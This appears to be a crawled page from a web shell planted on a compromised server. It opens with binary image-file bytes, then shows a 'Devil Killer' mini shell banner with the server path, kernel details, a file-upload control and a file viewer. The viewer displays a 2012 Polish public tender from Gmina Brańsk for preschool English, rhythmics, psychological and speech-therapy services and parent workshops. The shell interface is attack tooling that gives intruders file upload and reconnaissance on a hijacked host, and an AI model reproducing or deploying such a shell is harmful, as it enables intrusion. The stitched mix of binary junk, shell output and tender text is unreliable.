JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120921/360782-N-2012.html

<p class="kh_header"><b>Brańsk: Prowadzenie zajęć dodatkowych z języka angielskiego, prowadzenie zajęć dodatkowych z rytmiki, poradnictwo psychologiczne, poradnictwo logopedyczne, przeprowadzenie warsztatów dla rodziców w trzech punktach przedszkolnych na terenie Gminy Brańsk (ośrodkach wychowania przedszkolnego) w związku z projektem Edukacja dzieci naszą przyszłością - ośrodki wychowania przedszkolnego w  gminie Brańsk, w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 360782 - 2012; data zamieszczenia: 21.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brańsk , Rynek 8, 17-120 Brańsk, woj. podlaskie, tel. 085 737-50-31, faks 085 737-58-04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.ug.bransk.wrotapodlasia.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć dodatkowych z języka angielskiego, prowadzenie zajęć dodatkowych z rytmiki, poradnictwo psychologiczne, poradnictwo logopedyczne, przeprowadzenie warsztatów dla rodziców w trzech punktach przedszkolnych na terenie Gminy Brańsk (ośrodkach wychowania przedszkolnego) w związku z projektem Edukacja dzieci naszą przyszłością - ośrodki wychowania przedszkolnego w  gminie Brańsk, w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia publicznego jest usługa: Prowadzenie zajęć dodatkowych z języka angielskiego, prowadzenie zajęć dodatkowych z rytmiki, poradnictwo psychologiczne, poradnictwo logopedyczne, przeprowadzenie warsztatów dla rodziców w trzech punktach przedszkolnych na terenie Gminy Brańsk (ośrodkach wychowania przedszkolnego) w związku z projektem Edukacja dzieci naszą przyszłością - ośrodki wychowania przedszkolnego w  gminie Brańsk, w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Europejskiego Funduszu Społecznego.
Priorytet IX - Rozwój wykształcenia i kompetencji w regionach.
Działanie 9.1. - Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty.
Poddziałanie 9.1.1. - Zmniejszanie nierówności w stopniu upowszechniana edukacji przedszkolnej. 
Okres realizacji projektu - od 01.08.2012 r do 31.07.2014 r. 

Punkty przedszkolne na terenie Gminy Brańsk, w których będzie wykonywany przedmiot zamówienia :   
1)   Ośrodek wychowania przedszkolnego w  Domanowie z siedzibą w  Szkole Podstawowej im. por. Izydora Kołakowskiego w Domanowie, Domanowo 19 a, 17-120 Brańsk;  
2)  Ośrodek wychowania przedszkolnego w  Holonkach z  siedzibą w  Szkole Podstawowej im. Jana Pawła II w Holonkach, Holonki 67, 17-120 Brańsk;  
3)  Ośrodek wychowania przedszkolnego w  Chojewie z  siedzibą w  Szkole Podstawowej im. Jana Pawła II w Holonkach, Szkole Filialnej im. Ks. Stefana Kardynała Wyszyńskiego w Chojewie, Chojewo 109, 17-120 Brańsk.

Zamówienie zostało podzielone na następujące części:

Prowadzenie zajęć dodatkowych z języka angielskiego, dotyczy części I-III.
Wykonawca zobowiązany jest do prowadzenia zajęć z języka angielskiego z dziećmi w wieku 3-5 lat w punktach przedszkolnych na terenie Gminy Brańsk. Zajęcia będą organizowane od poniedziałku do piątku, w dni pracy szkoły, z uwzględnieniem przerw: święta ustawowo wolne od pracy, podczas letniej przerwy wakacyjnej, oraz inne dni wynikające z organizacji pracy szkoły. Wykonawca zobowiązany jest do świadczenia usługi zgodnie z harmonogramem zajęć ustalonym z dyrektorem danej placówki przed rozpoczęciem realizacji przedmiotu zamówienia. 
Wykonawca ma obowiązek przygotowania programu zajęć, dokumentów związanych z prowadzeniem zajęć w ramach projektu, współpracy z dyrektorami szkół, przy których zlokalizowane są punkty przedszkolne, z kadrą pedagogiczną, rodzicami oraz koordynatorem projektu.
Wykonawca zatrudniony będzie na podstawie umowy zlecenia.
Zamawiający w zakresie realizacji projektu udostępni pomieszczenia, sprzęt, meble oraz podstawowe materiały biurowe  celem należytego wykonania umowy.  
 
Łącznie liczba godzin w/w zajęć w 3 punktach przedszkolnych wynosi 492 godziny (w okresie trwania projektu). W roku 2012 liczba godzin wynosi 96, w roku 2013 liczba godzin wynosi 252, w 2014 roku liczba godzin wynosi 144. 

CZĘŚĆ I. Prowadzenie zajęć dodatkowych z języka angielskiego w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Domanowie.
Łączna ilość godzin w/w zajęć z dziećmi w wieku 3-5 lat - 164 godzin (w okresie trwania projektu):
w 2012 roku - 32 godz.  
w 2013 roku - 84 godz.
w 2014 roku - 48 godz. 
CZĘŚĆ II. Prowadzenie zajęć dodatkowych z języka angielskiego w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Holonkach.
Łączna ilość godzin w/w zajęć z dziećmi w wieku 3-5 lat - 164 godzin (w okresie trwania projektu):
w 2012 roku - 32 godz.  
w 2013 roku - 84 godz.
w 2014 roku - 48 godz. 
CZĘŚĆ III. Prowadzenie zajęć dodatkowych z języka angielskiego w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Chojewie.
Łączna ilość godzin w/w zajęć z dziećmi w wieku 3-5 lat - 164 godzin (w okresie trwania projektu):
w 2012 roku - 32 godz.  
w 2013 roku - 84 godz.
w 2014 roku - 48 godz. 

Prowadzenie zajęć dodatkowych z rytmiki, dotyczy części IV- VI.
Wykonawca zobowiązany jest do prowadzenie zajęć z rytmiki z dziećmi w wieku 3-5 lat w punktach przedszkolnych na terenie Gminy Brańsk. Zajęcia będą organizowane od poniedziałku do piątku, w dni pracy szkoły, z uwzględnieniem przerw: święta ustawowo wolne od pracy, podczas letniej przerwy wakacyjnej, oraz inne dni wynikające z organizacji pracy szkoły. Wykonawca zobowiązany jest do świadczenia usługi zgodnie z harmonogramem zajęć ustalonym z dyrektorem danej placówki przed rozpoczęciem realizacji przedmiotu zamówienia. 
Wykonawca ma obowiązek przygotowania programu zajęć, dokumentów związanych z prowadzeniem zajęć w ramach projektu, współpracy z dyrektorami szkół, przy których zlokalizowane są punkty przedszkolne, z kadrą pedagogiczną, rodzicami oraz koordynatorem projektu.
Wykonawca zatrudniony będzie na podstawie umowy zlecenia.
Zamawiający w zakresie realizacji projektu udostępni pomieszczenia, sprzęt, meble oraz podstawowe materiały biurowe  celem należytego wykonania umowy.   

Liczba godzin w/w zajęć w 3 punktach przedszkolnych wynosi 492 godziny (w okresie trwania projektu). W roku 2012 liczba godzin wynosi 96, w roku 2013 liczba godzin wynosi 252, w 2014 roku liczba godzin wynosi 144.

CZĘŚĆ IV. Prowadzenie zajęć dodatkowych z rytmiki w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Domanowie.
Łączna ilość godzin w/w zajęć z dziećmi w wieku 3-5 lat - 164 godzin (w okresie trwania projektu):
w 2012 roku - 32 godz.  
w 2013 roku - 84 godz.
w 2014 roku - 48 godz. 
CZĘŚĆ V. Prowadzenie zajęć dodatkowych z rytmiki w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Holonkach.
Łączna ilość godzin w/w zajęć z dziećmi w wieku 3-5 lat - 164 godzin (w okresie trwania projektu):
w 2012 roku - 32 godz.  
w 2013 roku - 84 godz.
w 2014 roku - 48 godz. 
CZĘŚĆ VI. Prowadzenie zajęć dodatkowych z rytmiki w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Chojewie.
Łączna ilość godzin w/w zajęć z dziećmi w wieku 3-5 lat - 164 godzin (w okresie trwania projektu)
w 2012 roku - 32 godz.  
w 2013 roku - 84 godz.
w 2014 roku - 48 godz. 

Poradnictwo psychologiczne, dotyczy części VII-IX.
Wykonawca jest zobowiązany do przeprowadzenia 240 godzin zajęć psychologicznych w okresie trwania Projektu. Zajęcia mają na celu wzmocnienie poczucia własnej wartości, zlikwidowanie lub osłabienie problemów emocjonalnych i barier w kontaktach z otoczeniem. Psycholog przeprowadzi zajęcia wsparcia dla dzieci, ukierunkuje rodziców jak wzmacniać podstawy i osobowość dziecka oraz przeprowadzi szkolenie dla rodziców na początku każdego roku szkolnego.
Zajęcia prowadzone będą w grupach, w  razie potrzeby indywidualnie.
Zajęcia będą organizowane od poniedziałku do piątku, w dni pracy szkoły, z uwzględnieniem przerw: święta ustawowo wolne od pracy, podczas letniej przerwy wakacyjnej, oraz inne dni wynikające z organizacji pracy szkoły. Wykonawca zobowiązany jest do świadczenia usługi zgodnie z harmonogramem zajęć ustalonym z dyrektorem danej placówki przed rozpoczęciem realizacji przedmiotu zamówienia. 
Wykonawca ma obowiązek opracowania programu zajęć, dokumentów związanych z prowadzeniem zajęć w ramach projektu, współpracy z dyrektorami szkół, przy których zlokalizowane są punkty przedszkolne, z kadrą pedagogiczną, rodzicami oraz koordynatorem projektu.
Wykonawca zatrudniony będzie na podstawie umowy zlecenia.
Zamawiający w zakresie realizacji projektu udostępni pomieszczenia, sprzęt, meble oraz podstawowe materiały biurowe  celem należytego wykonania umowy.   

Łącznie liczba godzin w/w zajęć w 3 punktach przedszkolnych wynosi 240 godzin (w okresie trwania projektu). W roku 2012 liczba godzin zajęć wynosi 48, w 2013 - 120 godzin, a w 2014 - 72 godziny.
CZĘŚĆ VII. Poradnictwo psychologiczne w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Domanowie.
Łączna ilość godzin w/w zajęć - 80 godzin (w okresie trwania projektu):
w 2012 roku - 16 godz.  
w 2013 roku - 40 godz.
w 2014 roku - 24 godz. 
CZĘŚĆ VIII. Poradnictwo psychologiczne w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Holonkach.
Łączna ilość godzin w/w zajęć - 80 godzin (w okresie trwania projektu):
w 2012 roku - 16 godz.  
w 2013 roku - 40 godz.
w 2014 roku - 24 godz. 
CZĘŚĆ IX. Poradnictwo psychologiczne w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Chojewie.
Łączna ilość godzin w/w zajęć - 80 godzin (w okresie trwania projektu):
w 2012 roku - 16 godz.  
w 2013 roku - 40 godz.
w 2014 roku - 24 godz. 


Poradnictwo logopedyczne, dotyczy części X-XII.
Wykonawca zobowiązany jest do przeprowadzenia zajęć logopedycznych dla dzieci w wieku 3-5 lat uczęszczających do 3 punktów przedszkolnych na terenie Gminy Brańsk.
Celem zajęć jest zlikwidowanie lub osłabienie wad wymowy, poprawienie samopoczucia dzieci w wyniku eliminowania wad. Logopeda po przeprowadzeniu diagnozy opracuje program i plan działań dla każdego punktu przedszkolnego na dany rok szkolny w celu zmniejszania lub niwelacji wad wymowy u dzieci oraz ukierunkuje rodziców pod kątem ćwiczeń domowych.
Zajęcia będą organizowane od poniedziałku do piątku, w dni pracy szkoły, z uwzględnieniem przerw: święta ustawowo wolne od pracy, podczas letniej przerwy wakacyjnej, oraz inne dni wynikające z organizacji pracy szkoły. Wykonawca zobowiązany jest do świadczenia usługi zgodnie z harmonogramem zajęć ustalonym z dyrektorem danej placówki przed rozpoczęciem realizacji przedmiotu zamówienia. 
Wykonawca ma obowiązek przygotowania programu zajęć, dokumentów związanych z prowadzeniem zajęć w ramach projektu, współpracy z dyrektorami szkół, przy których zlokalizowane są punkty przedszkolne, z kadrą pedagogiczną, rodzicami oraz koordynatorem projektu.
Wykonawca zatrudniony będzie na podstawie umowy zlecenia.
Zamawiający w zakresie realizacji projektu udostępni pomieszczenia, sprzęt, meble oraz podstawowe materiały biurowe  celem należytego wykonania umowy.
Zajęcia prowadzone będą w grupach, w razie potrzeby indywidualnie. 
Łączna liczba godzin zajęć w 3 punktach wynosi 240 godzin (w okresie trwania projektu). W 2012 roku - 48 godzin, w 2013 roku - 120 godzin, a w 2014 roku - 72 godziny.
CZĘŚĆ X. Poradnictwo logopedyczne w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Domanowie.
Łączna ilość godzin w/w zajęć - 80 godzin (w okresie trwania projektu):
w 2012 roku - 16 godz.  
w 2013 roku - 40 godz.
w 2014 roku - 24 godz. 
CZĘŚĆ XI. Poradnictwo logopedyczne w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Holonkach.
Łączna ilość godzin w/w zajęć - 80 godzin (w okresie trwania projektu):
w 2012 roku - 16 godz.  
w 2013 roku - 40 godz.
w 2014 roku - 24 godz. 
CZĘŚĆ XII. Poradnictwo logopedyczne w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Chojewie.
Łączna ilość godzin w/w zajęć - 80 godzin (w okresie trwania projektu):
w 2012 roku - 16 godz.  
w 2013 roku - 40 godz.
w 2014 roku - 24 godz. 
Przeprowadzenie warsztatów dla rodziców, dotyczy części XIII-XV.
Wykonawca zobowiązany jest do przeprowadzenia warsztatów dla rodziców w ciągu dwóch lat realizacji projektu, łącznie 96 godzin (w 3 punktach). Zajęcia organizowane będą w jednym z pierwszych miesięcy każdego roku szkolnego oraz w miesiącach zimowych (terminy zajęć ustalone zostaną z dyrektorami szkół przy których zlokalizowane są punkty przedszkolne oraz z koordynatorem projektu). Cykl warsztatów ma na celu zmienić poglądy na system edukacji, uświadomić rolę rodziców w tym systemie, dostrzegać problemy wychowawcze i prawidłowo im przeciwdziałać. 
Wykonawca ma obowiązek przygotowania modelowego programu warsztatów dla rodziców, opracowania programów, dokumentów związanych z prowadzeniem niniejszych warsztatów, współpracy z dyrektorami szkół, przy których zlokalizowane są punkty przedszkolne, z kadrą pedagogiczną, rodzicami oraz koordynatorem projektu. Ma obowiązek zbadania opinii uczestników oraz przekazania tych danych i swoich wniosków koordynatorowi projektu po zakończeniu zajęć. 
Wykonawca zatrudniony będzie na podstawie umowy zlecenia.
Zamawiający w zakresie realizacji projektu udostępni pomieszczenia, sprzęt, meble oraz podstawowe materiały biurowe  celem należytego wykonania umowy.
CZĘŚĆ XIII. Przeprowadzenie warsztatów dla rodziców w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Domanowie.
Łączna ilość godzin w/w zajęć - 32 godzin (w okresie trwania projektu)
w 2012 roku -  4 godz.  
w 2013 roku -  16 godz.
w 2014 roku -  12 godz. 
CZĘŚĆ XIV. Przeprowadzenie warsztatów dla rodziców w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Holonkach.
Łączna ilość godzin w/w zajęć -  32 godzin (w okresie trwania projektu)
w 2012 roku -   4  godz.  
w 2013 roku -  16 godz.
w 2014 roku -  12 godz. 
CZĘŚĆ XV. Przeprowadzenie warsztatów dla rodziców w punkcie przedszkolnym - ośrodku wychowania przedszkolnego w Chojewie.
Łączna ilość godzin w/w zajęć -  32 godzin (w okresie trwania projektu)
w 2012 roku -  4 godz.  
w 2013 roku -  16 godz.
w 2014 roku -  12 godz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.11.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE WYMAGANE</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni warunek jako spełniony wg formuły spełnia/nie spełnia w oparciu o oświadczenie - załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I - III. Wykonawca do prowadzenia zajęć dodatkowych z języka angielskiego:
- Posiadanie kwalifikacji do nauczania języka angielskiego, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli /Dz. U. z 2009 r., Nr 50, poz. 400 z późn. zm./
- Posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw  publicznych, 
- Osoba wobec której nie toczy się postępowanie karne lub dyscyplinarne, lub postępowanie o ubezwłasnowolnienie; nie była karana za przestępstwo popełnione  umyślnie.

CZĘŚĆ IV - VI. Wykonawca do prowadzenia zajęć dodatkowych z rytmiki:
- Posiadanie kwalifikacji do zajmowania stanowiska nauczyciela w przedszkolu zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli /Dz. U. z 2009 r., Nr 50, poz. 400 z późn. zm./
mile widziane posiadanie kwalifikacji z zakresu muzyki lub rytmiki oraz umiejętność gry na instrumentach muzycznych (nie obowiązkowe). 
- Posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw  
  publicznych, 
 - Osoba wobec której nie toczy się postępowanie karne lub dyscyplinarne, lub postępowanie o ubezwłasnowolnienie; nie była karana za przestępstwo popełnione  umyślnie. 

CZĘŚĆ VII - IX. Wykonawca  usługi - Poradnictwo psychologiczne.
- Posiadanie kwalifikacji określonych dla nauczyciela psychologa, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli /Dz. U. z 2009 r., Nr 50, poz. 400 z późn. zm./
- Posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw publicznych, 
 - Osoba wobec której nie toczy się postępowanie karne lub dyscyplinarne, lub postępowanie o ubezwłasnowolnienie; nie była karana za przestępstwo popełnione  umyślnie. 

CZĘŚĆ X-XII. Wykonawca usługi - Poradnictwo logopedyczne.
- Posiadanie kwalifikacji określonych dla nauczyciela logopedy, zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli /Dz. U. z 2009 r., Nr 50, poz. 400 z późn. zm./
- Posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw  
  publicznych, 
 - Osoba wobec której nie toczy się postępowanie karne lub dyscyplinarne, lub postępowanie o ubezwłasnowolnienie; nie była karana za przestępstwo popełnione umyślnie. 

CZĘŚĆ XIII - XV. Wykonawca usługi - Przeprowadzenie warsztatów dla rodziców.
- Posiadanie kwalifikacji określonych dla pedagoga,  zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli /Dz. U. z 2009 r., Nr 50, poz. 400 z późn. zm./
- Posiadanie pełnej zdolności do czynności prawnych oraz korzystanie z pełni praw  publicznych, 
 - Osoba wobec której nie toczy się postępowanie karne lub dyscyplinarne, lub postępowanie o ubezwłasnowolnienie; nie była karana za przestępstwo popełnione  umyślnie. 

Zamawiający oceni warunek jako spełniony wg. formuły spełnia/nie spełnia w oparciu o oświadczenie załącznik Nr 5 do SIWZ, Załącznik Nr 3 do SIWZ oraz dokumenty potwierdzające posiadane wykształcenie i uprawnienia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zdolny do wykonania zamówienia i posiada kwalifikacje do wykonania zamówienia lub dysponuje osobami zdolnymi do wykonania zamówienia oraz posiadającymi kwalifikacje niezbędne do wykonania zamówienia.
Zamawiający oceni warunek jako spełniony wg. formuły spełnia/nie spełnia w oparciu o oświadczenie załącznik Nr 5 do SIWZ, Załącznik Nr 3 do SIWZ oraz dokumenty potwierdzające posiadane wykształcenie i uprawnienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zdolny do wykonania zamówienia i posiada kwalifikacje do wykonania zamówienia lub dysponuje osobami zdolnymi do wykonania zamówienia oraz posiadającymi kwalifikacje niezbędne do wykonania zamówienia.
Zamawiający oceni warunek jako spełniony wg. formuły spełnia/nie spełnia w oparciu o oświadczenie załącznik Nr 5 do SIWZ, Załącznik Nr 3 do SIWZ oraz dokumenty potwierdzające posiadane wykształcenie i uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na to, iż Zamawiający nie nakłada na Wykonawcę żadnych wymogów dotyczących sytuacji ekonomicznej i finansowej warunek ten będzie spełniony przez każdego Wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

